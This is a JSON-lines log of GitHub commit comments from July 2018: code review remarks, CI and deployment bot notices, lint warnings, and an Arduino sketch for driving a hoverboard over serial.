{"id":"7992274925","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29772460,"position":103,"line":1642,"path":"tests/unit-tests/GravityView_Future_Test.php","commit_id":"a901f7741f7dea6c4a87114753a19fc291d5b874","created_at":"2018-07-20T00:18:00Z","updated_at":"2018-07-20T00:18:00Z","author_association":"MEMBER","body":"I believe this was stray code, too?"}},"created_at":"2018-07-20T00:18:00Z"}
{"id":"7992276544","type":"CommitCommentEvent","actor":{"login":"zackkatz"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29772463,"position":103,"line":1642,"path":"tests/unit-tests/GravityView_Future_Test.php","commit_id":"a901f7741f7dea6c4a87114753a19fc291d5b874","created_at":"2018-07-20T00:18:37Z","updated_at":"2018-07-20T00:18:37Z","author_association":"MEMBER","body":"lol, yes—that was for an example I was providing to a customer. Good catch 👏"}},"created_at":"2018-07-20T00:18:37Z"}
{"id":"7992279224","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29772472,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-20T00:19:43Z","updated_at":"2018-07-20T00:19:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T00:19:43Z"}
{"id":"7992280667","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29772478,"position":325,"line":325,"path":"content/post/hugo-pipes/index.md","commit_id":"b035564d253ce058b4de76cd716399c37022cc0c","created_at":"2018-07-20T00:20:15Z","updated_at":"2018-07-20T00:20:15Z","author_association":"COLLABORATOR","body":"you mean `vars.%x.js`?"}},"created_at":"2018-07-20T00:20:15Z"}
{"id":"7992281026","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29772482,"position":308,"line":308,"path":"content/post/hugo-pipes/index.md","commit_id":"b035564d253ce058b4de76cd716399c37022cc0c","created_at":"2018-07-20T00:20:23Z","updated_at":"2018-07-20T00:20:23Z","author_association":"COLLABORATOR","body":"you mean `vars.%x.js`?"}},"created_at":"2018-07-20T00:20:23Z"}
{"id":"7992281701","type":"CommitCommentEvent","actor":{"login":"papacheal"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29772484,"position":null,"line":null,"path":null,"commit_id":"c67b1642079356f837aeaaf91f3496146999b065","created_at":"2018-07-20T00:20:40Z","updated_at":"2018-07-20T00:20:40Z","author_association":"NONE","body":"Required IP is missing from -b parameter, so miner fails to launch.\r\n\r\ni.e. -b 0.0.0.0:4068"}},"created_at":"2018-07-20T00:20:40Z"}
{"id":"7992283344","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29772487,"position":null,"line":null,"path":null,"commit_id":"727b31c18f3185d13c7824717d890215feae524c","created_at":"2018-07-20T00:21:21Z","updated_at":"2018-07-20T00:21:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-136](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-136).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-136-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-20T00:21:21Z"}
{"id":"7992283785","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29772489,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-20T00:21:32Z","updated_at":"2018-07-20T00:21:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-20T00:21:32Z"}
{"id":"7992285451","type":"CommitCommentEvent","actor":{"login":"vladikoff"},"repo":{"name":"mozilla/fxa-email-service"},"payload":{"comment":{"id":29772492,"position":33,"line":326,"path":"src/settings/mod.rs","commit_id":"b69cfb5365629bbd2923e2b6a99f07186ad071ce","created_at":"2018-07-20T00:22:12Z","updated_at":"2018-07-20T00:22:12Z","author_association":"MEMBER","body":"Which would you prefer?"}},"created_at":"2018-07-20T00:22:12Z"}
{"id":"7992285483","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29772493,"position":110,"line":1649,"path":"tests/unit-tests/GravityView_Future_Test.php","commit_id":"a901f7741f7dea6c4a87114753a19fc291d5b874","created_at":"2018-07-20T00:22:13Z","updated_at":"2018-07-20T00:22:13Z","author_association":"MEMBER","body":"Database IDs are non-deterministic, the test used by this fails when the first ID is even vs. odd :hamburger:\r\n\r\nSo many edge cases :cactus:"}},"created_at":"2018-07-20T00:22:13Z"}
{"id":"7992286669","type":"CommitCommentEvent","actor":{"login":"MMartyn"},"repo":{"name":"mongodb/mongoid"},"payload":{"comment":{"id":29772500,"position":null,"line":null,"path":null,"commit_id":"5827264f674a2de0cc9a9f66da95458ab4dd8b78","created_at":"2018-07-20T00:22:40Z","updated_at":"2018-07-20T00:22:40Z","author_association":"NONE","body":"@estolfo I am using mongoid 6.2.1 where this file looks like so: https://github.com/mongodb/mongoid/blob/v6.2.1/lib/mongoid/query_cache.rb#L220 and I am noticing my application getting stuck in a state where it is unable to handle a primary switch sometimes and the errors point to this method. The error is \"not master and slaveOk=false\". I am wondering if this change was to prevent that issue. Thanks."}},"created_at":"2018-07-20T00:22:40Z"}
{"id":"7992292661","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Omnia-Contentus"},"payload":{"comment":{"id":29772513,"position":null,"line":null,"path":null,"commit_id":"7f73da115b265dafc3ccd78b6e87132ab3842c07","created_at":"2018-07-20T00:25:18Z","updated_at":"2018-07-20T00:25:18Z","author_association":"NONE","body":"<3"}},"created_at":"2018-07-20T00:25:18Z"}
{"id":"7992294566","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29772519,"position":null,"line":null,"path":null,"commit_id":"c2531bea7dfff51a0ba126a0110d734822a73876","created_at":"2018-07-20T00:26:07Z","updated_at":"2018-07-20T00:26:07Z","author_association":"NONE","body":"*sentences\r\nand you didn't capitalize the c after the period smh"}},"created_at":"2018-07-20T00:26:07Z"}
{"id":"7992295094","type":"CommitCommentEvent","actor":{"login":"Bluscream"},"repo":{"name":"Splamy/TS3AudioBot"},"payload":{"comment":{"id":29772521,"position":61,"line":null,"path":"TS3AudioBot/Web/Api/OpenApiGenerator.cs","commit_id":"8ec5eb909efe24f4c0b667f8ca6d4cf70eecf139","created_at":"2018-07-20T00:26:19Z","updated_at":"2018-07-20T00:26:19Z","author_association":"CONTRIBUTOR","body":"Sever, really?"}},"created_at":"2018-07-20T00:26:19Z"}
{"id":"7992295142","type":"CommitCommentEvent","actor":{"login":"abady123234"},"repo":{"name":"abady123234/pass"},"payload":{"comment":{"id":29772522,"position":1,"line":1,"path":"pass","commit_id":"db5361853ec4f36a1da497c7ed2ce94a4580efca","created_at":"2018-07-20T00:26:20Z","updated_at":"2018-07-20T00:26:20Z","author_association":"OWNER","body":"Hhhuy"}},"created_at":"2018-07-20T00:26:20Z"}
{"id":"7992296273","type":"CommitCommentEvent","actor":{"login":"KRHN"},"repo":{"name":"apple/foundationdb"},"payload":{"comment":{"id":29772523,"position":12,"line":371,"path":"FDBLibTLS/FDBLibTLSSession.cpp","commit_id":"bbee12f372e0ebe9c6e193adb95fac045919e643","created_at":"2018-07-20T00:26:52Z","updated_at":"2018-07-20T00:26:52Z","author_association":"NONE","body":"Libcrypto?"}},"created_at":"2018-07-20T00:26:52Z"}
{"id":"7992297183","type":"CommitCommentEvent","actor":{"login":"magonia"},"repo":{"name":"ntt-ns/Soft-Patch-Panel_tools"},"payload":{"comment":{"id":29772526,"position":null,"line":null,"path":null,"commit_id":"a9c627dd6298b8e987e6a9ef29530045252db8ee","created_at":"2018-07-20T00:27:17Z","updated_at":"2018-07-20T00:27:17Z","author_association":"COLLABORATOR","body":"If you want latest checkpatch.pl, try\r\n<pre>\r\nexport DPDK_CHECKPATCH_PATH='find /usr/src -name checkpatch.pl | xargs ls -t | head -1'\r\n</pre>"}},"created_at":"2018-07-20T00:27:17Z"}
{"id":"7992297917","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"Azure/doAzureParallel"},"payload":{"comment":{"id":29772529,"position":null,"line":null,"path":null,"commit_id":"081e73a81eddc804e05fc53b17c978c27122f005","created_at":"2018-07-20T00:27:36Z","updated_at":"2018-07-20T00:27:36Z","author_association":"NONE","body":"[R/batch-api.R:48:25:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/batch-api.R#L48) *style:* **Use <-, not =, for assignment.**\n```r\n​      containerSettings = list(\n                        ^\n```\n[R/batch-api.R:66:12:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/batch-api.R#L66) *style:* **Commented code should be removed.**\n```r\n​        #  dockerRunCommand(\"alfpark/blobxfer:0.12.1\", copyCommand, \"blobxfer\", FALSE)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:127:28:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/cluster.R#L127) *style:* **Use <-, not =, for assignment.**\n```r\n​    containerConfiguration = list(\n                           ^\n```\n[R/cluster.R:165:8:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/cluster.R#L165) *style:* **Commented code should be removed.**\n```r\n​      #loginCommand <- dockerLoginCommand(username, password, registry)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:167:50:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/cluster.R#L167) *style:* **Use <-, not =, for assignment.**\n```r\n​      containerConfiguration$containerRegistries = list(\n                                                 ^\n```\n[R/cluster.R:173:8:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/cluster.R#L173) *style:* **Commented code should be removed.**\n```r\n​      #commandLine <- c(commandLine, loginCommand)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:177:7:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/cluster.R#L177) *style:* **Commented code should be removed.**\n```r\n​    # pullImageCommand <- dockerPullCommand(dockerImage)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cluster.R:178:6:](https://github.com/Azure/doAzureParallel/blob/081e73a81eddc804e05fc53b17c978c27122f005/R/cluster.R#L178) *style:* **Commented code should be removed.**\n```r\n​    #commandLine <- c(commandLine, pullImageCommand)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-20T00:27:36Z"}
{"id":"7992303391","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29772535,"position":null,"line":null,"path":null,"commit_id":"25a03c68755766775d01a5d5687f52504907ee15","created_at":"2018-07-20T00:29:54Z","updated_at":"2018-07-20T00:29:54Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-63](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-63).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-63-tre.pantheonsite.io/)"}},"created_at":"2018-07-20T00:29:54Z"}
{"id":"7992304501","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772540,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-20T00:30:19Z","updated_at":"2018-07-20T00:30:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-836](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-836).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-836-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T00:30:19Z"}
{"id":"7992316423","type":"CommitCommentEvent","actor":{"login":"ScratchBuild"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29772564,"position":null,"line":null,"path":null,"commit_id":"e00edb1db1e85ccb62ee51c7b6fcc96a0b29926a","created_at":"2018-07-20T00:35:07Z","updated_at":"2018-07-20T00:35:07Z","author_association":"COLLABORATOR","body":"@Henry2o1o \r\nCurrently only \"Search\" or \"Settings\".\r\n\r\nSettings.apk/res/values/arrays.xml\r\n``` xml\r\n    <string-array name=\"status_bar_settings_notification_shade_shortcut_entries\">\r\n        <item>Search</item>\r\n        <item>Settings</item>\r\n    </string-array>\r\n```"}},"created_at":"2018-07-20T00:35:07Z"}
{"id":"7992317250","type":"CommitCommentEvent","actor":{"login":"LWSS"},"repo":{"name":"LWSS/Fuzion"},"payload":{"comment":{"id":29772568,"position":null,"line":null,"path":null,"commit_id":"385d642e69c3b185273b5e56c8930807d360cfbe","created_at":"2018-07-20T00:35:25Z","updated_at":"2018-07-20T00:35:25Z","author_association":"OWNER","body":"#222 "}},"created_at":"2018-07-20T00:35:25Z"}
{"id":"7992319458","type":"CommitCommentEvent","actor":{"login":"Splamy"},"repo":{"name":"Splamy/TS3AudioBot"},"payload":{"comment":{"id":29772572,"position":61,"line":null,"path":"TS3AudioBot/Web/Api/OpenApiGenerator.cs","commit_id":"8ec5eb909efe24f4c0b667f8ca6d4cf70eecf139","created_at":"2018-07-20T00:36:17Z","updated_at":"2018-07-20T00:36:17Z","author_association":"OWNER","body":"It's just a prototype. The problem is swagger doesn't event show you this string :/ would have probably noticed there."}},"created_at":"2018-07-20T00:36:17Z"}
{"id":"7992320690","type":"CommitCommentEvent","actor":{"login":"faddat"},"repo":{"name":"cosmos/cosmos-sdk"},"payload":{"comment":{"id":29772574,"position":null,"line":null,"path":null,"commit_id":"c1af6c53d8b371f67092ff3acc0a47adf2045209","created_at":"2018-07-20T00:36:47Z","updated_at":"2018-07-20T00:36:47Z","author_association":"NONE","body":"Super, super awesome.  Thanks @svaishnavy .  "}},"created_at":"2018-07-20T00:36:47Z"}
{"id":"7992322709","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772578,"position":null,"line":null,"path":null,"commit_id":"3fada1c26e2657bc49403dd37b4fb5857730c1c8","created_at":"2018-07-20T00:37:39Z","updated_at":"2018-07-20T00:37:39Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-838](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-838).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-838-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T00:37:39Z"}
{"id":"7992325937","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772586,"position":null,"line":null,"path":null,"commit_id":"02d0e0d6a10056cd9f1f084ae26aece18fd0ee82","created_at":"2018-07-20T00:39:04Z","updated_at":"2018-07-20T00:39:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-841](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-841).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-841-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T00:39:04Z"}
{"id":"7992330202","type":"CommitCommentEvent","actor":{"login":"mdcg361-charlie"},"repo":{"name":"django/django"},"payload":{"comment":{"id":29772595,"position":null,"line":null,"path":null,"commit_id":"931c60c5216bd71bc11f489e00e063331cf21f40","created_at":"2018-07-20T00:40:55Z","updated_at":"2018-07-20T00:40:55Z","author_association":"NONE","body":"Thanks, "}},"created_at":"2018-07-20T00:40:55Z"}
{"id":"7992334771","type":"CommitCommentEvent","actor":{"login":"jhaaaa"},"repo":{"name":"mDuo13/ripple-dev-portal"},"payload":{"comment":{"id":29772609,"position":13,"line":32,"path":"content/concepts/payment-system-basics/accounts/depositauth.md","commit_id":"693f7e649390116c85674632b2bc2e98d9dde4aa","created_at":"2018-07-20T00:42:56Z","updated_at":"2018-07-20T00:42:56Z","author_association":"NONE","body":"Should all of the \"Can\"s be bolded? Just an FYI that the 2nd and 3rd are not bolded."}},"created_at":"2018-07-20T00:42:56Z"}
{"id":"7992336581","type":"CommitCommentEvent","actor":{"login":"jspenguin2017"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29772618,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-20T00:43:41Z","updated_at":"2018-07-20T00:43:41Z","author_association":"NONE","body":"> Just found out this does not work, this is actually a bug -- just this one should work theoretically. Need to fix this.\r\n\r\nOh WOW, I thought it's by design, and I even implemented a linter rule specifically for that... 7 months ago... \r\n\r\n<details>\r\n\r\n![image](https://user-images.githubusercontent.com/7283682/42977014-150b8454-8b82-11e8-8cd4-1320f8af1807.png)\r\n\r\n</details>\r\n<br />\r\n\r\nThere are a few other quirks with the `redirect=` rule, for example, these rules are allowed: \r\n\r\n```\r\n*$script,redirect=noopjs,domain=example.com\r\n*/example.js|$script,redirect=noopjs,domain=example.com|example2.com\r\n```\r\n\r\nBut these are not: \r\n\r\n```\r\n$script,redirect=noopjs,domain=example.com\r\n*/example.js|$script,redirect=noopjs,first-party\r\n```\r\n\r\n(First one failed the initial RegExp test, second one fails because there is no destination domain.)\r\n"}},"created_at":"2018-07-20T00:43:41Z"}
{"id":"7992340814","type":"CommitCommentEvent","actor":{"login":"qbert2k"},"repo":{"name":"GluuFederation/oxAuth"},"payload":{"comment":{"id":29772632,"position":null,"line":null,"path":null,"commit_id":"069d839582c52a7879aca8710b4af2c7a2094860","created_at":"2018-07-20T00:45:39Z","updated_at":"2018-07-20T00:45:39Z","author_association":"CONTRIBUTOR","body":"oxAuth #851"}},"created_at":"2018-07-20T00:45:39Z"}
{"id":"7992342462","type":"CommitCommentEvent","actor":{"login":"jhaaaa"},"repo":{"name":"mDuo13/ripple-dev-portal"},"payload":{"comment":{"id":29772643,"position":31,"line":68,"path":"content/concepts/payment-system-basics/accounts/depositauth.md","commit_id":"693f7e649390116c85674632b2bc2e98d9dde4aa","created_at":"2018-07-20T00:46:23Z","updated_at":"2018-07-20T00:46:23Z","author_association":"NONE","body":"NICE!"}},"created_at":"2018-07-20T00:46:23Z"}
{"id":"7992343043","type":"CommitCommentEvent","actor":{"login":"Parksy1234"},"repo":{"name":"NiklasFauth/hoverboard-firmware-hack"},"payload":{"comment":{"id":29772647,"position":null,"line":null,"path":null,"commit_id":"db9194e9bdaa918b4e4554319d99175108818f8a","created_at":"2018-07-20T00:46:40Z","updated_at":"2018-07-20T00:46:40Z","author_association":"NONE","body":"i finally got the comms working for my 4 wheel drive trolley....\r\n\r\n /* 20/7/2018\r\n  * Reads two analog pins A0 aqnd A1 that are connected to a jostick made of two \r\n  * potentiometers, then sends x and y as 2x 2bytes @9600 baud 8N1 to the \r\n  * Hoverboards Usart2 RX. \r\n  * By Parksy1234@Hotmail.com for output comms to control a hoverboard thats\r\n  * thats using custom firmware from Github by Niklas Fauth.\r\n  * https://github.com/NiklasFauth/Hoverboard-Board-Hack\r\n  */\r\n  #include <SoftwareSerial.h>   // Its used because ports 0 and 1 are being used \r\n                                // for Serial monitor and it corrupts the output.\r\n                               \r\n  SoftwareSerial mySerial(4,3); // RX on pin 4 to TX on PA2, TX on pin 3 to TX on\r\n                                // PA3 of the Hoverboard Usart 2. Connect ground \r\n                                // but not the vcc power.\r\n                                // Padding resistors may be needed if your arduino\r\n                                // CPU outputs are 5 volts, i used a Studuino.\r\n\r\n  int ledPin = 13;\r\n  int xpin = A0;                // steer slider variable connecetd to analog pin 0 \r\n  int ypin = A1;                // speed slider variable connecetd to analog pin 1\r\n  uint16_t steer = 0;          // variable to read the value from the analog pin 0\r\n  uint16_t speeed = 0;         // THERE IS A REASON ITS MISPELT !\r\n  int countr = 20;             // Counter for the comms delay.\r\n  int button = 0;\r\n  int dlyshorter = A2;\r\n  int dlylonger = A3;\r\n  \r\n void setup() {\r\n  pinMode(ledPin, OUTPUT);           // For the Blinky.\r\n  pinMode(dlyshorter, INPUT_PULLUP); // comms delay -\r\n  pinMode(dlylonger, INPUT_PULLUP);  // comms delay +\r\n  Serial.begin(9600);                // Baud rate for Serial.print\r\n  mySerial.begin(9600);              // Baud rate for Serial.write \r\n }\r\n \r\n void loop() {\r\n  button = digitalRead(dlyshorter);\r\n  if (button == LOW) {\r\n  countr -=1;\r\n  }\r\n  button = digitalRead(dlylonger);\r\n  if (button == LOW) {\r\n  countr +=1;\r\n  }\r\n  if (countr <1) {\r\n  countr = 50;\r\n  }\r\n \r\n  steer = analogRead(xpin);      // Reads the value of the X pot.\r\n  digitalWrite(ledPin, HIGH);    // because it wants to have a blinky.     \r\n  delay(countr);                 // A small pause is needed between reading analog \r\n                                 // pins, otherwise we get the same value twice.\r\n  speeed = analogRead(ypin);     // reads the value of the Y pot.\r\n  digitalWrite(ledPin, LOW);     // and ... no blinky.\r\n  Serial.println(\" \");\r\n  Serial.print(\"Steering = \");\r\n  Serial.print(steer);\r\n  Serial.print(\" Thottle = \");\r\n  Serial.print(speeed);\r\n  Serial.print(\" Comms Delay = \");\r\n  Serial.print(countr);\r\n  Serial.print(\" 2x int16 bytes for the X and Y Joystick = \");\r\n  // The package...\r\n  mySerial.write((uint8_t *) &steer, sizeof(steer));   // spit out 2 bytes then\r\n  mySerial.write((uint8_t *) &speeed, sizeof(speeed)); // spit out 2 more bytes\r\n  // delay = (countr);        // then a comms delay, but i moved it in between \r\n                              // the ADC readings. Enjoy.\r\n }\r\n\r\n"}},"created_at":"2018-07-20T00:46:40Z"}
{"id":"7992347820","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29772661,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-20T00:48:49Z","updated_at":"2018-07-20T00:48:49Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2821 of 2982 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 23 tests had: ERR diffs.\n * 58 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 482\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.6%25-yellow.png)</a> \n"}},"created_at":"2018-07-20T00:48:49Z"}
{"id":"7992348355","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29772664,"position":14,"line":14,"path":"src/hdskins/java/com/voxelmodpack/hdskins/util/Optionals.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-20T00:49:03Z","updated_at":"2018-07-20T00:49:03Z","author_association":"MEMBER","body":"`optional.orElse(def)`"}},"created_at":"2018-07-20T00:49:03Z"}
{"id":"7992351457","type":"CommitCommentEvent","actor":{"login":"zuiderkwast"},"repo":{"name":"josefs/Gradualizer"},"payload":{"comment":{"id":29772679,"position":6,"line":97,"path":"test/typechecker_tests.erl","commit_id":"b5c8d53ed1626d4f73e564dd705fecf4f279638c","created_at":"2018-07-20T00:50:28Z","updated_at":"2018-07-20T00:50:28Z","author_association":"COLLABORATOR","body":"These look like positive tests to me."}},"created_at":"2018-07-20T00:50:28Z"}
{"id":"7992354180","type":"CommitCommentEvent","actor":{"login":"jong920224"},"repo":{"name":"jong920224/FinalProjectV1"},"payload":{"comment":{"id":29772684,"position":null,"line":null,"path":null,"commit_id":"a81f02ef91af2bbfa7b0a952d27e045cb274d92f","created_at":"2018-07-20T00:51:42Z","updated_at":"2018-07-20T00:51:42Z","author_association":"OWNER","body":"sad"}},"created_at":"2018-07-20T00:51:42Z"}
{"id":"7992355599","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29772687,"position":5,"line":28,"path":"src/hdskins/java/com/voxelmodpack/hdskins/server/SkinServer.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-20T00:52:18Z","updated_at":"2018-07-20T00:52:18Z","author_association":"MEMBER","body":"`public static final` is implied when defining a variable/constant on an interface."}},"created_at":"2018-07-20T00:52:18Z"}
{"id":"7992359140","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29772693,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-20T00:53:44Z","updated_at":"2018-07-20T00:53:44Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T00:53:44Z"}
{"id":"7992361435","type":"CommitCommentEvent","actor":{"login":"alwaysphone"},"repo":{"name":"alwaysphone/helloworld"},"payload":{"comment":{"id":29772696,"position":null,"line":null,"path":null,"commit_id":"8a52e1d30dd0a49887e20ca5986ff5dfba0e1613","created_at":"2018-07-20T00:54:41Z","updated_at":"2018-07-20T00:54:41Z","author_association":"OWNER","body":"ddddd"}},"created_at":"2018-07-20T00:54:41Z"}
{"id":"7992365080","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29772705,"position":7,"line":48,"path":"sql/schema.sql","commit_id":"0e0ada1d1be7c89f74e80caa8b0f40d63b050df7","created_at":"2018-07-20T00:56:20Z","updated_at":"2018-07-20T00:56:20Z","author_association":"COLLABORATOR","body":"Change the primary key to be the user id instead of username. Saves memory and will be faster. "}},"created_at":"2018-07-20T00:56:20Z"}
